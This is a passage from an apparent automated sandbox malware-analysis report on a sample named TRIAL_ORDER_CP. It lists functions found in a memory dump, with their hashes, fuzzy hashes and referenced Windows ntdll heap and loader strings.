                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-523794902
                                          • Opcode ID: f59df00c8c5e402564dfcfab9e125b5046d51e239f95792b3b1300bbcfcff2c8
                                          • Instruction ID: 96f7be0d37be2f0063de6a036e9bb95c833b6b03586c2b26e84e1c314923f531
                                          • Opcode Fuzzy Hash: f59df00c8c5e402564dfcfab9e125b5046d51e239f95792b3b1300bbcfcff2c8
                                          • Instruction Fuzzy Hash: 5B42CC756087819FD305CF28C880B2ABBE5FF88688F084A7DE895DB652DB34D945CF52
                                          Function 33B2B0D0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                          • API String ID: 0-122214566
                                          • Opcode ID: 5a7c082ce054aaa069bb9fb21cc4503f63822dfb88bc384e24e8809cacd376b0
                                          • Instruction ID: d5cab7cb579b1dc3e41c769c017d4bca494a5a2ce9d1d91163e45ef13b65e121
                                          • Opcode Fuzzy Hash: 5a7c082ce054aaa069bb9fb21cc4503f63822dfb88bc384e24e8809cacd376b0
                                          • Instruction Fuzzy Hash: 13C12275E007259EEB04CB64C891BBEBFA5EF45301F58427AE85AEB290EF748D44C391
                                          Function 33B4631F Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-792281065
                                          • Opcode ID: f6f757ce51e9103dba1bb0de93c631bbfe28b2a47e72eaf15e7bb03af7166569
                                          • Instruction ID: 9b771ced0b61beecd7659e53501c50538a3925d4335c2c3ba5162b1aff21f01b
                                          • Opcode Fuzzy Hash: f6f757ce51e9103dba1bb0de93c631bbfe28b2a47e72eaf15e7bb03af7166569
                                          • Instruction Fuzzy Hash: F29155B5E053E4DFEB24DF18C944B9A77A4FB40758F04013AE954AF682EB709C42CB95
                                          Function 33B42594 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                          Download Yara Rule
                                          Strings
                                          • RtlGetAssemblyStorageRoot, xrefs: 33B81F6A, 33B81FA4, 33B81FC4
                                          • SXS: %s() passed the empty activation context, xrefs: 33B81F6F
                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 33B81F8A
                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 33B81FA9
                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 33B81F82
                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 33B81FC9
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                          • API String ID: 0-861424205
                                          • Opcode ID: 51c6a329a5187428ec0058d3d20ce2ce0509d38d4e9a92c7a11816255aac0cd2
                                          • Instruction ID: 89bd963fe356bb56d392ae837ee5291a19712cf56a71b1314dd2150fe063f513
                                          • Opcode Fuzzy Hash: 51c6a329a5187428ec0058d3d20ce2ce0509d38d4e9a92c7a11816255aac0cd2
                                          • Instruction Fuzzy Hash: EE310576E02224BBFB108A89DC40F5B7668EF406D0F0441BAF940BF242C771AE00DBE8
                                          Function 33B4C5C6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                          Download Yara Rule
                                          Strings
                                          • minkernel\ntdll\ldrinit.c, xrefs: 33B4C5E3
                                          • LdrpInitializeImportRedirection, xrefs: 33B87F82, 33B87FF6
                                          • Loading import redirection DLL: '%wZ', xrefs: 33B87F7B
                                          • LdrpInitializeProcess, xrefs: 33B4C5E4
                                          • minkernel\ntdll\ldrredirect.c, xrefs: 33B87F8C, 33B88000
                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 33B87FF0
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                          • API String ID: 0-475462383
                                          • Opcode ID: c69327aad5aecc1993aa26ef286aadb29ff0b970e440411610743adf55b6b652
                                          • Instruction ID: 58a5d4482770dc9c4ab11c3ca26fefd095c65dab8aa1931dfd517c77b364001a
                                          • Opcode Fuzzy Hash: c69327aad5aecc1993aa26ef286aadb29ff0b970e440411610743adf55b6b652
                                          • Instruction Fuzzy Hash: 1C31E5B1A05391AFD314EF28DC46E2AB7D4EFC5B64F014979F894AB291D620DC05CBA2
                                          Function 33B20680 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-4253913091
                                          • Opcode ID: 858a8101bce6b57d2d92b21684d162882740f5250098d528ed93581ac4e2af09
                                          • Instruction ID: 78abde16e37e3b2583910d6ee37b73a152328d247bdd3143d6c2c1a47c6dd241
                                          • Opcode Fuzzy Hash: 858a8101bce6b57d2d92b21684d162882740f5250098d528ed93581ac4e2af09
                                          • Instruction Fuzzy Hash: 48F18874A00745DFEB05CF68C884F6ABBB5FF44344F1482A9E459DB691DB38E981CB90
                                          Function 33B39723 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                          • API String ID: 3446177414-2283098728
                                          • Opcode ID: 5425d36efdfd6a76ffefade2879a5633c27cdcb1c9ac15296516440e510e397c
                                          • Instruction ID: 9661685729be7e6854dc7445f563257c5de47e7841d8e00a11071489ea10960d
                                          • Opcode Fuzzy Hash: 5425d36efdfd6a76ffefade2879a5633c27cdcb1c9ac15296516440e510e397c
                                          • Instruction Fuzzy Hash: F451F271A023619FE710EF28C884F1977A4FB86364F18063DE4A5DB6D2EB70E815CB91
                                          Function 33B4C640 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • Failed to reallocate the system dirs string !, xrefs: 33B880E2
                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 33B880E9
                                          • minkernel\ntdll\ldrinit.c, xrefs: 33B880F3
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                          • API String ID: 3446177414-1783798831
                                          • Opcode ID: 5f64ae07f18115a0f803d5b99576a0372f91146b9ccf32d4e10301d04ebf514a
                                          • Instruction ID: fdcb12dc2d6b2f91c5c06a46747e11d5b5b1df4d5ea401f9186c5defe693ec17
                                          • Opcode Fuzzy Hash: 5f64ae07f18115a0f803d5b99576a0372f91146b9ccf32d4e10301d04ebf514a
                                          • Instruction Fuzzy Hash: 7A41C2B5901390ABD710EF24CD40F4B7BE8EF44B54F05493AB998E7251EB74E801CB95
                                          Function 33B943D5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 33B94508
                                          • LdrpCheckRedirection, xrefs: 33B9450F
                                          • minkernel\ntdll\ldrredirect.c, xrefs: 33B94519
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                          • API String ID: 3446177414-3154609507
                                          • Opcode ID: d778e28753607958f9e21f367405f84be20ecda38504bad5f9f508f0563613a6
                                          • Instruction ID: 70b94db1da560ab40fe3595ad13462ad49b4e816050288d3997655f89a1e40a4
                                          • Opcode Fuzzy Hash: d778e28753607958f9e21f367405f84be20ecda38504bad5f9f508f0563613a6
                                          • Instruction Fuzzy Hash: 4C419F76605361DBEB11CF58C940A9677E8EFC8794F0A0679EC989B351DB30DC808B91
                                          Function 33B3510F Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                          Download Yara Rule
                                          Strings
                                          • Kernel-MUI-Number-Allowed, xrefs: 33B35167
                                          • Kernel-MUI-Language-Disallowed, xrefs: 33B35272
                                          • Kernel-MUI-Language-Allowed, xrefs: 33B3519B
                                          • Kernel-MUI-Language-SKU, xrefs: 33B3534B
                                          • WindowsExcludedProcs, xrefs: 33B3514A
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                          • API String ID: 0-258546922
                                          • Opcode ID: 8c46c3de531caf22914afbe962c85e1faeb9efad19db15f1f5f07ee5fdde8243
                                          • Instruction ID: 182166cbeb1df43ea794769f2cdb6066f76389c0b0153c55aec7692342ecbe4d
                                          • Opcode Fuzzy Hash: 8c46c3de531caf22914afbe962c85e1faeb9efad19db15f1f5f07ee5fdde8243
                                          • Instruction Fuzzy Hash: B5F15CB6D01229EFDB16CF99C940EDEBBB8EF09650F54016BE515E7610EB709E01CBA0
                                          Function 33BEACEB Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: 4f74acef7037d2dd39c800fdf85ec95970c9fb04b5a6ee740a5eca309be6f0f5
                                          • Instruction ID: 5cd4874107662bbab20c594234ae6e2d0986ca77a1c8faad82ba3105853fcdd4
                                          • Opcode Fuzzy Hash: 4f74acef7037d2dd39c800fdf85ec95970c9fb04b5a6ee740a5eca309be6f0f5
                                          • Instruction Fuzzy Hash: 63F1D476E006258BCB08CF6CD99067DFBF9EF88210B594179D496EB391D734EA41CB90
                                          Function 33B07662 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                          • API String ID: 0-3061284088
                                          • Opcode ID: 274403c2610d1868dc21411bc957c80d4a16ca58a01bb35ea487e4a061414d5d
                                          • Instruction ID: 6548ef7f63d56fd305a1d80ba200d8ecc627d4f2df6fd9acf2fe3491de4453f9
                                          • Opcode Fuzzy Hash: 274403c2610d1868dc21411bc957c80d4a16ca58a01bb35ea487e4a061414d5d
                                          • Instruction Fuzzy Hash: 31014C76506290DEE305D32CE408F867BA4EB4173EF1944BAF44047DA38BA5D880DD60
                                          Function 33B1A2E0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                          • API String ID: 0-379654539
                                          • Opcode ID: 8769b7ae1c937c61a4b1be7124f0674e235c3d3277cde239f442138fb5fb8608
                                          • Instruction ID: 6c2e790b81312f9a8a01bfc1812462bda1de68625523a5827dc338600c2b805a
                                          • Opcode Fuzzy Hash: 8769b7ae1c937c61a4b1be7124f0674e235c3d3277cde239f442138fb5fb8608
                                          • Instruction Fuzzy Hash: 9CC187B4908382CFE711CF58C180B5AB7E4EF89744F04897AF8959B250E734EA5ACB52
                                          Function 33B48322 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                          Download Yara Rule
                                          Strings
                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 33B4847E
                                          • @, xrefs: 33B484B1
                                          • minkernel\ntdll\ldrinit.c, xrefs: 33B48341
                                          • LdrpInitializeProcess, xrefs: 33B48342
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-1918872054
                                          • Opcode ID: 70e418969a2ac6c866c5a30854cadd376de5feed8e735ea5eceb0e3cbaa5ca3f
                                          • Instruction ID: 396bd573c9998f675a74db9f6af3be9a6af84a75043647e81a09070737cc9408
                                          • Opcode Fuzzy Hash: 70e418969a2ac6c866c5a30854cadd376de5feed8e735ea5eceb0e3cbaa5ca3f
                                          • Instruction Fuzzy Hash: BE918A71909395AFE721DE20C840EABBBECEF84384F44093EFA88D6550E735C944DB66
                                          Function 33B4265C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                          Download Yara Rule
                                          Strings
                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 33B820C0
                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 33B81FE3, 33B820BB
                                          • SXS: %s() passed the empty activation context, xrefs: 33B81FE8
                                          • .Local, xrefs: 33B427F8
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                          • API String ID: 0-1239276146
                                          • Opcode ID: e73ed88f9ce2731a0096978919edb70549a0ac23053f515f81595f4e6b83fa46
                                          • Instruction ID: c14f79723061ce344ad3b5d427cec35ea136b40e88189e6735d40f3e75edbbd3
                                          • Opcode Fuzzy Hash: e73ed88f9ce2731a0096978919edb70549a0ac23053f515f81595f4e6b83fa46
                                          • Instruction Fuzzy Hash: 72A19B759003299BEB24CF64DC84B99B3B4FF58354F1501FAE888AB251DB319E81EF94
                                          Function 33B163CB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                          Download Yara Rule
                                          Strings
                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 33B70E2F
                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 33B70E72
                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 33B70DEC
                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 33B70EB5
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                          • API String ID: 0-1468400865
                                          • Opcode ID: ae2a91513a61aa4455bfd27be068d6291bb364e4427c70c100b2c66d5b93fed1
                                          • Instruction ID: f18be00af7f7cc718ea4a1def6e743c1f562639adf9d91625f5fc16067836561
                                          • Opcode Fuzzy Hash: ae2a91513a61aa4455bfd27be068d6291bb364e4427c70c100b2c66d5b93fed1
                                          • Instruction Fuzzy Hash: 7F71ACB1D083189FE750DF14C884F8B7BA8EF847A4F444879FD888A656D734E588DB92
                                          Function 33B0F5C7 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                          • API String ID: 0-2586055223
                                          • Opcode ID: c84c54da9d8182e18baadd4d94612d3e72781c5a710b455f1dcd5540a8f43964
                                          • Instruction ID: cdc363db75416f02168328499d0c344fa1d0e4978cd670fb7b9ff34e9f0bdf04
                                          • Opcode Fuzzy Hash: c84c54da9d8182e18baadd4d94612d3e72781c5a710b455f1dcd5540a8f43964
                                          • Instruction Fuzzy Hash: 4F61E1757053809FE311CB64C944F5BBBE9EB84B94F080979F9998B6A2DB34D840CB62
                                          Function 33B090F8 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                          • API String ID: 2994545307-1391187441
                                          • Opcode ID: 401ab6bb13dbce464e3dd840f1918e695dfbf2f0c1d1c629fbb864acf466c813
                                          • Instruction ID: a2317b29b75b7aa1969cfba2da1d460709d6deda20a680553b5bd88d7e2fef34
                                          • Opcode Fuzzy Hash: 401ab6bb13dbce464e3dd840f1918e695dfbf2f0c1d1c629fbb864acf466c813
                                          • Instruction Fuzzy Hash: 8931A136A01215FFDB11CB59DC84F9ABBB8EF45764F1444B2F914AB2A2D770E940CE60
                                          Function 33BA3608 Relevance: 4.1, Strings: 3, Instructions: 398COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                          • API String ID: 0-1168191160
                                          • Opcode ID: 02db20453926cd89ae09cedbd43b0ad827ed1deaafa6aee9d497844671b34c00
                                          • Instruction ID: 15ce4dc262991dee44944811f29449681816755da1c5e7fc1dcfa6337e4583df
                                          • Opcode Fuzzy Hash: 02db20453926cd89ae09cedbd43b0ad827ed1deaafa6aee9d497844671b34c00
                                          • Instruction Fuzzy Hash: 22F16DB5A087288BDB60CB18CC90B99B3B5EF44754F5441FAE94DA7240EB319E85CF64
                                          Function 33B11380 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                          Download Yara Rule
                                          Strings
                                          • HEAP[%wZ]: , xrefs: 33B11632
                                          • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 33B11648
                                          • HEAP: , xrefs: 33B114B6
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                          • API String ID: 0-3178619729
                                          • Opcode ID: 26bca43d3d6441c02809e21faedd78ed8110226bd4307b991974c421f932bbcd
                                          • Instruction ID: 91160f99f2597673f6bc74e368fa27dc227275107a911b8db3f660e62ee7aa97
                                          • Opcode Fuzzy Hash: 26bca43d3d6441c02809e21faedd78ed8110226bd4307b991974c421f932bbcd
                                          • Instruction Fuzzy Hash: 5CE1ED74A043559FEB18CF28C491BBABBE5EF88304F188979E4D6CB246E734E950DB50
                                          Function 33B1B5E0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
